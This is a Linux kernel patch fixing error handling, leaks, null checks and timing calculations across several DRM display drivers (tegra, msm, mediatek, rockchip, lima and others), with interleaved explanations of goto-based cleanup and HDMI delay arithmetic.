+index 009b5861a3fec..d6c5d48c878ec 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_hw_sequencer.c
+@@ -1854,6 +1854,9 @@ bool dcn10_set_output_transfer_func(struct dc *dc, struct pipe_ctx *pipe_ctx,
+ {
+ 	struct dpp *dpp = pipe_ctx->plane_res.dpp;
+ 
++	if (!stream)
++		return false;
++
+ 	if (dpp == NULL)
+ 		return false;
+ 
+@@ -1876,8 +1879,8 @@ bool dcn10_set_output_transfer_func(struct dc *dc, struct pipe_ctx *pipe_ctx,
+ 	} else
+ 		dpp->funcs->dpp_program_regamma_pwl(dpp, NULL, OPP_REGAMMA_BYPASS);
+ 
+-	if (stream != NULL && stream->ctx != NULL &&
+-			stream->out_transfer_func != NULL) {
++	if (stream->ctx &&
++	    stream->out_transfer_func) {
+ 		log_tf(stream->ctx,
+ 				stream->out_transfer_func,
+ 				dpp->regamma_params.hw_points_num);
+diff --git a/drivers/gpu/drm/lima/lima_gem.c b/drivers/gpu/drm/lima/lima_gem.c
+index 0f1ca0b0db495..d72c5bf4e5ac1 100644
+--- a/drivers/gpu/drm/lima/lima_gem.c
++++ b/drivers/gpu/drm/lima/lima_gem.c
+@@ -75,29 +75,34 @@ int lima_heap_alloc(struct lima_bo *bo, struct lima_vm *vm)
+ 	} else {
+ 		bo->base.sgt = kmalloc(sizeof(*bo->base.sgt), GFP_KERNEL);
+ 		if (!bo->base.sgt) {
+-			sg_free_table(&sgt);
+-			return -ENOMEM;
++			ret = -ENOMEM;
++			goto err_out0;
+ 		}
+ 	}
+ 
+ 	ret = dma_map_sgtable(dev, &sgt, DMA_BIDIRECTIONAL, 0);
+-	if (ret) {
+-		sg_free_table(&sgt);
+-		kfree(bo->base.sgt);
+-		bo->base.sgt = NULL;
+-		return ret;
+-	}
++	if (ret)
++		goto err_out1;
+ 
+ 	*bo->base.sgt = sgt;
+ 
+ 	if (vm) {
+ 		ret = lima_vm_map_bo(vm, bo, old_size >> PAGE_SHIFT);
+ 		if (ret)
+-			return ret;
++			goto err_out2;
+ 	}
+ 
+ 	bo->heap_size = new_size;
+ 	return 0;
++
++err_out2:
++	dma_unmap_sgtable(dev, &sgt, DMA_BIDIRECTIONAL, 0);
++err_out1:
++	kfree(bo->base.sgt);
++	bo->base.sgt = NULL;
++err_out0:
++	sg_free_table(&sgt);
++	return ret;
+ }
+ 
+ int lima_gem_create_handle(struct drm_device *dev, struct drm_file *file,
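
The lima rewrite is the canonical goto unwind: each acquisition gets a label, errors jump to the label that undoes everything acquired so far, and the labels fall through in reverse order. A runnable userspace model of the shape (resources reduced to three mallocs; in a real driver they would outlive the function, they are freed on success here only to keep the example leak-free):

#include <stdlib.h>

/* Acquire a, b, c in order; on failure, release in reverse order. */
static int setup(void)
{
	char *a, *b, *c;
	int ret = -1;

	a = malloc(16);
	if (!a)
		goto err_out0;
	b = malloc(16);
	if (!b)
		goto err_out1;
	c = malloc(16);
	if (!c)
		goto err_out2;

	free(c);
	free(b);
	free(a);
	return 0;

err_out2:
	free(b);	/* undo step 2, then fall through */
err_out1:
	free(a);	/* undo step 1 */
err_out0:
	return ret;	/* nothing acquired yet */
}

int main(void) { return setup() ? 1 : 0; }
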
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_crtc.c b/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
+index 558000db4a100..beaaf44004cfd 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
+@@ -91,11 +91,13 @@ static void mtk_drm_crtc_finish_page_flip(struct mtk_drm_crtc *mtk_crtc)
+ 	struct drm_crtc *crtc = &mtk_crtc->base;
+ 	unsigned long flags;
+ 
+-	spin_lock_irqsave(&crtc->dev->event_lock, flags);
+-	drm_crtc_send_vblank_event(crtc, mtk_crtc->event);
+-	drm_crtc_vblank_put(crtc);
+-	mtk_crtc->event = NULL;
+-	spin_unlock_irqrestore(&crtc->dev->event_lock, flags);
++	if (mtk_crtc->event) {
++		spin_lock_irqsave(&crtc->dev->event_lock, flags);
++		drm_crtc_send_vblank_event(crtc, mtk_crtc->event);
++		drm_crtc_vblank_put(crtc);
++		mtk_crtc->event = NULL;
++		spin_unlock_irqrestore(&crtc->dev->event_lock, flags);
++	}
+ }
+ 
+ static void mtk_drm_finish_page_flip(struct mtk_drm_crtc *mtk_crtc)
+diff --git a/drivers/gpu/drm/mediatek/mtk_dsi.c b/drivers/gpu/drm/mediatek/mtk_dsi.c
+index 3e74c7c1b89fa..d871b1dba083d 100644
+--- a/drivers/gpu/drm/mediatek/mtk_dsi.c
++++ b/drivers/gpu/drm/mediatek/mtk_dsi.c
+@@ -70,8 +70,8 @@
+ #define DSI_PS_WC			0x3fff
+ #define DSI_PS_SEL			(3 << 16)
+ #define PACKED_PS_16BIT_RGB565		(0 << 16)
+-#define LOOSELY_PS_18BIT_RGB666		(1 << 16)
+-#define PACKED_PS_18BIT_RGB666		(2 << 16)
++#define PACKED_PS_18BIT_RGB666		(1 << 16)
++#define LOOSELY_PS_24BIT_RGB666		(2 << 16)
+ #define PACKED_PS_24BIT_RGB888		(3 << 16)
+ 
+ #define DSI_VSA_NL		0x20
+@@ -366,10 +366,10 @@ static void mtk_dsi_ps_control_vact(struct mtk_dsi *dsi)
+ 		ps_bpp_mode |= PACKED_PS_24BIT_RGB888;
+ 		break;
+ 	case MIPI_DSI_FMT_RGB666:
+-		ps_bpp_mode |= PACKED_PS_18BIT_RGB666;
++		ps_bpp_mode |= LOOSELY_PS_24BIT_RGB666;
+ 		break;
+ 	case MIPI_DSI_FMT_RGB666_PACKED:
+-		ps_bpp_mode |= LOOSELY_PS_18BIT_RGB666;
++		ps_bpp_mode |= PACKED_PS_18BIT_RGB666;
+ 		break;
+ 	case MIPI_DSI_FMT_RGB565:
+ 		ps_bpp_mode |= PACKED_PS_16BIT_RGB565;
+@@ -423,7 +423,7 @@ static void mtk_dsi_ps_control(struct mtk_dsi *dsi)
+ 		dsi_tmp_buf_bpp = 3;
+ 		break;
+ 	case MIPI_DSI_FMT_RGB666:
+-		tmp_reg = LOOSELY_PS_18BIT_RGB666;
++		tmp_reg = LOOSELY_PS_24BIT_RGB666;
+ 		dsi_tmp_buf_bpp = 3;
+ 		break;
+ 	case MIPI_DSI_FMT_RGB666_PACKED:
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+index 25245ef386db6..3632f0768aa9e 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+@@ -228,6 +228,13 @@ bool dpu_encoder_is_widebus_enabled(const struct drm_encoder *drm_enc)
+ 	return dpu_enc->wide_bus_en;
+ }
+ 
++bool dpu_encoder_is_dsc_enabled(const struct drm_encoder *drm_enc)
++{
++	const struct dpu_encoder_virt *dpu_enc = to_dpu_encoder_virt(drm_enc);
++
++	return dpu_enc->dsc ? true : false;
++}
++
+ int dpu_encoder_get_crc_values_cnt(const struct drm_encoder *drm_enc)
+ {
+ 	struct dpu_encoder_virt *dpu_enc;
+@@ -1864,7 +1871,9 @@ static void dpu_encoder_prep_dsc(struct dpu_encoder_virt *dpu_enc,
+ 	dsc_common_mode = 0;
+ 	pic_width = dsc->pic_width;
+ 
+-	dsc_common_mode = DSC_MODE_MULTIPLEX | DSC_MODE_SPLIT_PANEL;
++	dsc_common_mode = DSC_MODE_SPLIT_PANEL;
++	if (dpu_encoder_use_dsc_merge(enc_master->parent))
++		dsc_common_mode |= DSC_MODE_MULTIPLEX;
+ 	if (enc_master->intf_mode == INTF_MODE_VIDEO)
+ 		dsc_common_mode |= DSC_MODE_VIDEO;
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.h b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.h
+index 9e7236ef34e6d..a71efa2b9e508 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.h
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.h
+@@ -175,6 +175,13 @@ int dpu_encoder_get_vsync_count(struct drm_encoder *drm_enc);
+ 
+ bool dpu_encoder_is_widebus_enabled(const struct drm_encoder *drm_enc);
+ 
++/**
++ * dpu_encoder_is_dsc_enabled - indicate whether dsc is enabled
++ *				for the encoder.
++ * @drm_enc:    Pointer to previously created drm encoder structure
++ */
++bool dpu_encoder_is_dsc_enabled(const struct drm_encoder *drm_enc);
++
+ /**
+  * dpu_encoder_get_crc_values_cnt - get number of physical encoders contained
+  *	in virtual encoder that can collect CRC values
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_vid.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_vid.c
+index 2c14646661b77..2baade1cd4876 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_vid.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_vid.c
+@@ -100,6 +100,7 @@ static void drm_mode_to_intf_timing_params(
+ 	}
+ 
+ 	timing->wide_bus_en = dpu_encoder_is_widebus_enabled(phys_enc->parent);
++	timing->compression_en = dpu_encoder_is_dsc_enabled(phys_enc->parent);
+ 
+ 	/*
+	 * for DP, divide the horizontal parameters by 2 when
+@@ -256,12 +257,14 @@ static void dpu_encoder_phys_vid_setup_timing_engine(
+ 		mode.htotal >>= 1;
+ 		mode.hsync_start >>= 1;
+ 		mode.hsync_end >>= 1;
++		mode.hskew >>= 1;
+ 
+ 		DPU_DEBUG_VIDENC(phys_enc,
+-			"split_role %d, halve horizontal %d %d %d %d\n",
++			"split_role %d, halve horizontal %d %d %d %d %d\n",
+ 			phys_enc->split_role,
+ 			mode.hdisplay, mode.htotal,
+-			mode.hsync_start, mode.hsync_end);
++			mode.hsync_start, mode.hsync_end,
++			mode.hskew);
+ 	}
+ 
+ 	drm_mode_to_intf_timing_params(phys_enc, &mode, &timing_params);
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c
+index 384558d2f9602..1debac4fcc3eb 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c
+@@ -154,13 +154,8 @@ static void dpu_hw_intf_setup_timing_engine(struct dpu_hw_intf *ctx,
+ 	hsync_ctl = (hsync_period << 16) | p->hsync_pulse_width;
+ 	display_hctl = (hsync_end_x << 16) | hsync_start_x;
+ 
+-	/*
+-	 * DATA_HCTL_EN controls data timing which can be different from
+-	 * video timing. It is recommended to enable it for all cases, except
+-	 * if compression is enabled in 1 pixel per clock mode
+-	 */
+ 	if (p->wide_bus_en)
+-		intf_cfg2 |= INTF_CFG2_DATABUS_WIDEN | INTF_CFG2_DATA_HCTL_EN;
++		intf_cfg2 |= INTF_CFG2_DATABUS_WIDEN;
+ 
+ 	data_width = p->width;
+ 
+@@ -230,6 +225,14 @@ static void dpu_hw_intf_setup_timing_engine(struct dpu_hw_intf *ctx,
+ 	DPU_REG_WRITE(c, INTF_CONFIG, intf_cfg);
+ 	DPU_REG_WRITE(c, INTF_PANEL_FORMAT, panel_format);
+ 	if (ctx->cap->features & BIT(DPU_DATA_HCTL_EN)) {
++		/*
++		 * DATA_HCTL_EN controls data timing which can be different from
++		 * video timing. It is recommended to enable it for all cases, except
++		 * if compression is enabled in 1 pixel per clock mode
++		 */
++		if (!(p->compression_en && !p->wide_bus_en))
++			intf_cfg2 |= INTF_CFG2_DATA_HCTL_EN;
++
+ 		DPU_REG_WRITE(c, INTF_CONFIG2, intf_cfg2);
+ 		DPU_REG_WRITE(c, INTF_DISPLAY_DATA_HCTL, display_data_hctl);
+ 		DPU_REG_WRITE(c, INTF_ACTIVE_DATA_HCTL, active_data_hctl);
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.h b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.h
+index e75339b96a1d2..7f502c8bee1d4 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.h
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.h
+@@ -33,6 +33,7 @@ struct intf_timing_params {
+ 	u32 hsync_skew;
+ 
+ 	bool wide_bus_en;
++	bool compression_en;
+ };
+ 
+ struct intf_prog_fetch {
+diff --git a/drivers/gpu/drm/nouveau/nouveau_bo.c b/drivers/gpu/drm/nouveau/nouveau_bo.c
+index 126b3c6e12f99..f2dca41e46c5f 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_bo.c
++++ b/drivers/gpu/drm/nouveau/nouveau_bo.c
+@@ -1194,6 +1194,8 @@ nouveau_ttm_io_mem_reserve(struct ttm_device *bdev, struct ttm_resource *reg)
+ 			drm_vma_node_unmap(&nvbo->bo.base.vma_node,
+ 					   bdev->dev_mapping);
+ 			nouveau_ttm_io_mem_free_locked(drm, nvbo->bo.resource);
++			nvbo->bo.resource->bus.offset = 0;
++			nvbo->bo.resource->bus.addr = NULL;
+ 			goto retry;
+ 		}
+ 
+diff --git a/drivers/gpu/drm/panel/panel-edp.c b/drivers/gpu/drm/panel/panel-edp.c
+index 42584d8a9aeb6..bfcddd4aa9322 100644
+--- a/drivers/gpu/drm/panel/panel-edp.c
++++ b/drivers/gpu/drm/panel/panel-edp.c
+@@ -413,8 +413,7 @@ static int panel_edp_unprepare(struct drm_panel *panel)
+ 	if (!p->prepared)
+ 		return 0;
+ 
+-	pm_runtime_mark_last_busy(panel->dev);
+-	ret = pm_runtime_put_autosuspend(panel->dev);
++	ret = pm_runtime_put_sync_suspend(panel->dev);
+ 	if (ret < 0)
+ 		return ret;
+ 	p->prepared = false;
+diff --git a/drivers/gpu/drm/radeon/ni.c b/drivers/gpu/drm/radeon/ni.c
+index 927e5f42e97d0..3e48cbb522a1c 100644
+--- a/drivers/gpu/drm/radeon/ni.c
++++ b/drivers/gpu/drm/radeon/ni.c
+@@ -813,7 +813,7 @@ int ni_init_microcode(struct radeon_device *rdev)
+ 			err = 0;
+ 		} else if (rdev->smc_fw->size != smc_req_size) {
+ 			pr_err("ni_mc: Bogus length %zu in firmware \"%s\"\n",
+-			       rdev->mc_fw->size, fw_name);
++			       rdev->smc_fw->size, fw_name);
+ 			err = -EINVAL;
+ 		}
+ 	}
+diff --git a/drivers/gpu/drm/rockchip/inno_hdmi.c b/drivers/gpu/drm/rockchip/inno_hdmi.c
+index f51774866f412..8f230f4c01bc3 100644
+--- a/drivers/gpu/drm/rockchip/inno_hdmi.c
++++ b/drivers/gpu/drm/rockchip/inno_hdmi.c
+@@ -411,7 +411,7 @@ static int inno_hdmi_config_video_timing(struct inno_hdmi *hdmi,
+ 	hdmi_writeb(hdmi, HDMI_VIDEO_EXT_HBLANK_L, value & 0xFF);
+ 	hdmi_writeb(hdmi, HDMI_VIDEO_EXT_HBLANK_H, (value >> 8) & 0xFF);
+ 
+-	value = mode->hsync_start - mode->hdisplay;
++	value = mode->htotal - mode->hsync_start;
+ 	hdmi_writeb(hdmi, HDMI_VIDEO_EXT_HDELAY_L, value & 0xFF);
+ 	hdmi_writeb(hdmi, HDMI_VIDEO_EXT_HDELAY_H, (value >> 8) & 0xFF);
+ 
+@@ -426,7 +426,7 @@ static int inno_hdmi_config_video_timing(struct inno_hdmi *hdmi,
+ 	value = mode->vtotal - mode->vdisplay;
+ 	hdmi_writeb(hdmi, HDMI_VIDEO_EXT_VBLANK, value & 0xFF);
+ 
+-	value = mode->vsync_start - mode->vdisplay;
++	value = mode->vtotal - mode->vsync_start;
+ 	hdmi_writeb(hdmi, HDMI_VIDEO_EXT_VDELAY, value & 0xFF);
+ 
+ 	value = mode->vsync_end - mode->vsync_start;
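
The inno_hdmi fix is pure timing arithmetic: the EXT_HDELAY/EXT_VDELAY registers evidently measure from the start of sync to active video, i.e. sync width plus back porch, which is htotal - hsync_start — not the front porch hsync_start - hdisplay that the old code programmed (and likewise vertically). A quick check with standard 1080p60 CEA timings (mode numbers assumed from that standard):

#include <stdio.h>

int main(void)
{
	/* 1920x1080@60: front porch 88, sync 44, back porch 148 */
	int hdisplay = 1920, hsync_start = 2008, htotal = 2200;

	printf("old value (front porch): %d\n", hsync_start - hdisplay); /* 88 */
	printf("new value (sync + bp):   %d\n", htotal - hsync_start);   /* 192 */
	return 0;
}
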
+diff --git a/drivers/gpu/drm/rockchip/rockchip_lvds.c b/drivers/gpu/drm/rockchip/rockchip_lvds.c
+index 68f6ebb33460b..eb4a108c5bd2a 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_lvds.c
++++ b/drivers/gpu/drm/rockchip/rockchip_lvds.c
+@@ -577,8 +577,7 @@ static int rockchip_lvds_bind(struct device *dev, struct device *master,
+ 		ret = -EINVAL;
+ 		goto err_put_port;
+ 	} else if (ret) {
+-		DRM_DEV_ERROR(dev, "failed to find panel and bridge node\n");
+-		ret = -EPROBE_DEFER;
++		dev_err_probe(dev, ret, "failed to find panel and bridge node\n");
+ 		goto err_put_port;
+ 	}
+ 	if (lvds->panel)
+diff --git a/drivers/gpu/drm/tegra/dpaux.c b/drivers/gpu/drm/tegra/dpaux.c
+index d773ef4854188..b563988fb6848 100644
+--- a/drivers/gpu/drm/tegra/dpaux.c
++++ b/drivers/gpu/drm/tegra/dpaux.c
+@@ -524,7 +524,7 @@ static int tegra_dpaux_probe(struct platform_device *pdev)
+ 	if (err < 0) {
+ 		dev_err(dpaux->dev, "failed to request IRQ#%u: %d\n",
+ 			dpaux->irq, err);
+-		return err;
++		goto err_pm_disable;
+ 	}
+ 
+ 	disable_irq(dpaux->irq);
+@@ -544,7 +544,7 @@ static int tegra_dpaux_probe(struct platform_device *pdev)
+ 	 */
+ 	err = tegra_dpaux_pad_config(dpaux, DPAUX_PADCTL_FUNC_I2C);
+ 	if (err < 0)
+-		return err;
++		goto err_pm_disable;
+ 
+ #ifdef CONFIG_GENERIC_PINCONF
+ 	dpaux->desc.name = dev_name(&pdev->dev);
+@@ -557,7 +557,8 @@ static int tegra_dpaux_probe(struct platform_device *pdev)
+ 	dpaux->pinctrl = devm_pinctrl_register(&pdev->dev, &dpaux->desc, dpaux);
+ 	if (IS_ERR(dpaux->pinctrl)) {
+ 		dev_err(&pdev->dev, "failed to register pincontrol\n");
+-		return PTR_ERR(dpaux->pinctrl);
++		err = PTR_ERR(dpaux->pinctrl);
++		goto err_pm_disable;
+ 	}
+ #endif
+ 	/* enable and clear all interrupts */
+@@ -573,10 +574,15 @@ static int tegra_dpaux_probe(struct platform_device *pdev)
+ 	err = devm_of_dp_aux_populate_ep_devices(&dpaux->aux);
+ 	if (err < 0) {
+ 		dev_err(dpaux->dev, "failed to populate AUX bus: %d\n", err);
+-		return err;
++		goto err_pm_disable;
+ 	}
+ 
+ 	return 0;
++
++err_pm_disable:
++	pm_runtime_put_sync(&pdev->dev);
++	pm_runtime_disable(&pdev->dev);
++	return err;
+ }
+ 
+ static int tegra_dpaux_remove(struct platform_device *pdev)
+diff --git a/drivers/gpu/drm/tegra/dsi.c b/drivers/gpu/drm/tegra/dsi.c
+index de1333dc0d867..7bb26655cb3cc 100644
+--- a/drivers/gpu/drm/tegra/dsi.c
++++ b/drivers/gpu/drm/tegra/dsi.c
+@@ -1534,9 +1534,11 @@ static int tegra_dsi_ganged_probe(struct tegra_dsi *dsi)
+ 	np = of_parse_phandle(dsi->dev->of_node, "nvidia,ganged-mode", 0);
+ 	if (np) {
+ 		struct platform_device *gangster = of_find_device_by_node(np);
++		of_node_put(np);
++		if (!gangster)
++			return -EPROBE_DEFER;
+ 
+ 		dsi->slave = platform_get_drvdata(gangster);
+-		of_node_put(np);
+ 
+ 		if (!dsi->slave) {
+ 			put_device(&gangster->dev);
+@@ -1584,48 +1586,58 @@ static int tegra_dsi_probe(struct platform_device *pdev)
+ 
+ 	if (!pdev->dev.pm_domain) {
+ 		dsi->rst = devm_reset_control_get(&pdev->dev, "dsi");
+-		if (IS_ERR(dsi->rst))
+-			return PTR_ERR(dsi->rst);
++		if (IS_ERR(dsi->rst)) {
++			err = PTR_ERR(dsi->rst);
++			goto remove;
++		}
+ 	}
+ 
+ 	dsi->clk = devm_clk_get(&pdev->dev, NULL);
+ 	if (IS_ERR(dsi->clk)) {
+-		dev_err(&pdev->dev, "cannot get DSI clock\n");
+-		return PTR_ERR(dsi->clk);
++		err = dev_err_probe(&pdev->dev, PTR_ERR(dsi->clk),
++				    "cannot get DSI clock\n");
++		goto remove;
+ 	}
+ 
+ 	dsi->clk_lp = devm_clk_get(&pdev->dev, "lp");
+ 	if (IS_ERR(dsi->clk_lp)) {
+-		dev_err(&pdev->dev, "cannot get low-power clock\n");
+-		return PTR_ERR(dsi->clk_lp);
++		err = dev_err_probe(&pdev->dev, PTR_ERR(dsi->clk_lp),
++				    "cannot get low-power clock\n");
++		goto remove;
+ 	}
+ 
+ 	dsi->clk_parent = devm_clk_get(&pdev->dev, "parent");
+ 	if (IS_ERR(dsi->clk_parent)) {
+-		dev_err(&pdev->dev, "cannot get parent clock\n");
+-		return PTR_ERR(dsi->clk_parent);
++		err = dev_err_probe(&pdev->dev, PTR_ERR(dsi->clk_parent),
++				    "cannot get parent clock\n");
++		goto remove;
+ 	}
+ 
+ 	dsi->vdd = devm_regulator_get(&pdev->dev, "avdd-dsi-csi");
+ 	if (IS_ERR(dsi->vdd)) {
+-		dev_err(&pdev->dev, "cannot get VDD supply\n");
+-		return PTR_ERR(dsi->vdd);
++		err = dev_err_probe(&pdev->dev, PTR_ERR(dsi->vdd),
++				    "cannot get VDD supply\n");
++		goto remove;
+ 	}
+ 
+ 	err = tegra_dsi_setup_clocks(dsi);
+ 	if (err < 0) {
+ 		dev_err(&pdev->dev, "cannot setup clocks\n");
+-		return err;
++		goto remove;
+ 	}
+ 
+ 	regs = platform_get_resource(pdev, IORESOURCE_MEM, 0);
+ 	dsi->regs = devm_ioremap_resource(&pdev->dev, regs);
+-	if (IS_ERR(dsi->regs))
+-		return PTR_ERR(dsi->regs);
++	if (IS_ERR(dsi->regs)) {
++		err = PTR_ERR(dsi->regs);
++		goto remove;
++	}
+ 
+ 	dsi->mipi = tegra_mipi_request(&pdev->dev, pdev->dev.of_node);
+-	if (IS_ERR(dsi->mipi))
+-		return PTR_ERR(dsi->mipi);
++	if (IS_ERR(dsi->mipi)) {
++		err = PTR_ERR(dsi->mipi);
++		goto remove;
++	}
+ 
+ 	dsi->host.ops = &tegra_dsi_host_ops;
+ 	dsi->host.dev = &pdev->dev;
+@@ -1653,9 +1665,12 @@ static int tegra_dsi_probe(struct platform_device *pdev)
+ 	return 0;
+ 
+ unregister:
++	pm_runtime_disable(&pdev->dev);
+ 	mipi_dsi_host_unregister(&dsi->host);
+ mipi_free:
+ 	tegra_mipi_free(dsi->mipi);
++remove:
++	tegra_output_remove(&dsi->output);
+ 	return err;
+ }
+ 
+diff --git a/drivers/gpu/drm/tegra/fb.c b/drivers/gpu/drm/tegra/fb.c
+index 9291209154a7a..a688ecf08451e 100644
+--- a/drivers/gpu/drm/tegra/fb.c
++++ b/drivers/gpu/drm/tegra/fb.c
+@@ -166,6 +166,7 @@ struct drm_framebuffer *tegra_fb_create(struct drm_device *drm,
+ 
+ 		if (gem->size < size) {
+ 			err = -EINVAL;
++			drm_gem_object_put(gem);
+ 			goto unreference;
+ 		}
+ 
+diff --git a/drivers/gpu/drm/tegra/hdmi.c b/drivers/gpu/drm/tegra/hdmi.c
+index bf240767dad9f..c66764c0bd250 100644
+--- a/drivers/gpu/drm/tegra/hdmi.c
++++ b/drivers/gpu/drm/tegra/hdmi.c
+@@ -1776,7 +1776,6 @@ static irqreturn_t tegra_hdmi_irq(int irq, void *data)
+ static int tegra_hdmi_probe(struct platform_device *pdev)
+ {
+ 	struct tegra_hdmi *hdmi;
+-	struct resource *regs;
+ 	int err;
+ 
+ 	hdmi = devm_kzalloc(&pdev->dev, sizeof(*hdmi), GFP_KERNEL);
+@@ -1838,14 +1837,15 @@ static int tegra_hdmi_probe(struct platform_device *pdev)
+ 	if (err < 0)
+ 		return err;
+ 
+-	regs = platform_get_resource(pdev, IORESOURCE_MEM, 0);
+-	hdmi->regs = devm_ioremap_resource(&pdev->dev, regs);
+-	if (IS_ERR(hdmi->regs))
+-		return PTR_ERR(hdmi->regs);
++	hdmi->regs = devm_platform_ioremap_resource(pdev, 0);
++	if (IS_ERR(hdmi->regs)) {
++		err = PTR_ERR(hdmi->regs);
++		goto remove;
++	}
+ 
+ 	err = platform_get_irq(pdev, 0);
+ 	if (err < 0)
+-		return err;
++		goto remove;
+ 
+ 	hdmi->irq = err;
+ 
+@@ -1854,18 +1854,18 @@ static int tegra_hdmi_probe(struct platform_device *pdev)
+ 	if (err < 0) {
+ 		dev_err(&pdev->dev, "failed to request IRQ#%u: %d\n",
+ 			hdmi->irq, err);
+-		return err;
++		goto remove;
+ 	}
+ 
+ 	platform_set_drvdata(pdev, hdmi);
+ 
+ 	err = devm_pm_runtime_enable(&pdev->dev);
+ 	if (err)
+-		return err;
++		goto remove;
+ 
+ 	err = devm_tegra_core_dev_init_opp_table_common(&pdev->dev);
+ 	if (err)
+-		return err;
++		goto remove;
+ 
+ 	INIT_LIST_HEAD(&hdmi->client.list);
+ 	hdmi->client.ops = &hdmi_client_ops;
+@@ -1875,10 +1875,14 @@ static int tegra_hdmi_probe(struct platform_device *pdev)
+ 	if (err < 0) {
+ 		dev_err(&pdev->dev, "failed to register host1x client: %d\n",
+ 			err);
+-		return err;
++		goto remove;
+ 	}
+ 
+ 	return 0;
++
++remove:
++	tegra_output_remove(&hdmi->output);
++	return err;
+ }
+ 
+ static int tegra_hdmi_remove(struct platform_device *pdev)
+diff --git a/drivers/gpu/drm/tegra/output.c b/drivers/gpu/drm/tegra/output.c
+index 47d26b5d99456..7ccd010a821b7 100644
+--- a/drivers/gpu/drm/tegra/output.c
++++ b/drivers/gpu/drm/tegra/output.c
+@@ -139,8 +139,10 @@ int tegra_output_probe(struct tegra_output *output)
+ 						       GPIOD_IN,
+ 						       "HDMI hotplug detect");
+ 	if (IS_ERR(output->hpd_gpio)) {
+-		if (PTR_ERR(output->hpd_gpio) != -ENOENT)
+-			return PTR_ERR(output->hpd_gpio);
++		if (PTR_ERR(output->hpd_gpio) != -ENOENT) {
++			err = PTR_ERR(output->hpd_gpio);
++			goto put_i2c;
++		}
+ 
+ 		output->hpd_gpio = NULL;
+ 	}
+@@ -149,7 +151,7 @@ int tegra_output_probe(struct tegra_output *output)
+ 		err = gpiod_to_irq(output->hpd_gpio);
+ 		if (err < 0) {
+ 			dev_err(output->dev, "gpiod_to_irq(): %d\n", err);
+-			return err;
++			goto put_i2c;
+ 		}
+ 
+ 		output->hpd_irq = err;
+@@ -162,7 +164,7 @@ int tegra_output_probe(struct tegra_output *output)
+ 		if (err < 0) {
+ 			dev_err(output->dev, "failed to request IRQ#%u: %d\n",
+ 				output->hpd_irq, err);
+-			return err;
++			goto put_i2c;
+ 		}
+ 
+ 		output->connector.polled = DRM_CONNECTOR_POLL_HPD;
+@@ -176,6 +178,12 @@ int tegra_output_probe(struct tegra_output *output)
+ 	}
+ 
+ 	return 0;
++
++put_i2c:
++	if (output->ddc)
++		i2c_put_adapter(output->ddc);
++
++	return err;
+ }
+ 
+ void tegra_output_remove(struct tegra_output *output)
+diff --git a/drivers/gpu/drm/tegra/rgb.c b/drivers/gpu/drm/tegra/rgb.c
+index ff8fce36d2aa1..86e55e5d12b39 100644
+--- a/drivers/gpu/drm/tegra/rgb.c
++++ b/drivers/gpu/drm/tegra/rgb.c
+@@ -214,26 +214,28 @@ int tegra_dc_rgb_probe(struct tegra_dc *dc)
+ 	rgb->clk = devm_clk_get(dc->dev, NULL);
+ 	if (IS_ERR(rgb->clk)) {
+ 		dev_err(dc->dev, "failed to get clock\n");
+-		return PTR_ERR(rgb->clk);
++		err = PTR_ERR(rgb->clk);
++		goto remove;
+ 	}
+ 
+ 	rgb->clk_parent = devm_clk_get(dc->dev, "parent");
+ 	if (IS_ERR(rgb->clk_parent)) {
+ 		dev_err(dc->dev, "failed to get parent clock\n");
+-		return PTR_ERR(rgb->clk_parent);
++		err = PTR_ERR(rgb->clk_parent);
++		goto remove;
+ 	}
+ 
+ 	err = clk_set_parent(rgb->clk, rgb->clk_parent);
+ 	if (err < 0) {
+ 		dev_err(dc->dev, "failed to set parent clock: %d\n", err);
+-		return err;
++		goto remove;
+ 	}
+ 
+ 	rgb->pll_d_out0 = clk_get_sys(NULL, "pll_d_out0");
+ 	if (IS_ERR(rgb->pll_d_out0)) {
+ 		err = PTR_ERR(rgb->pll_d_out0);
+ 		dev_err(dc->dev, "failed to get pll_d_out0: %d\n", err);
+-		return err;
++		goto remove;
+ 	}
+ 
+ 	if (dc->soc->has_pll_d2_out0) {
+@@ -241,13 +243,19 @@ int tegra_dc_rgb_probe(struct tegra_dc *dc)
+ 		if (IS_ERR(rgb->pll_d2_out0)) {
+ 			err = PTR_ERR(rgb->pll_d2_out0);
+ 			dev_err(dc->dev, "failed to get pll_d2_out0: %d\n", err);
+-			return err;
++			goto put_pll;
+ 		}
+ 	}
+ 
+ 	dc->rgb = &rgb->output;
+ 
+ 	return 0;
++
++put_pll:
++	clk_put(rgb->pll_d_out0);
++remove:
++	tegra_output_remove(&rgb->output);
++	return err;
+ }
+ 
+ int tegra_dc_rgb_remove(struct tegra_dc *dc)
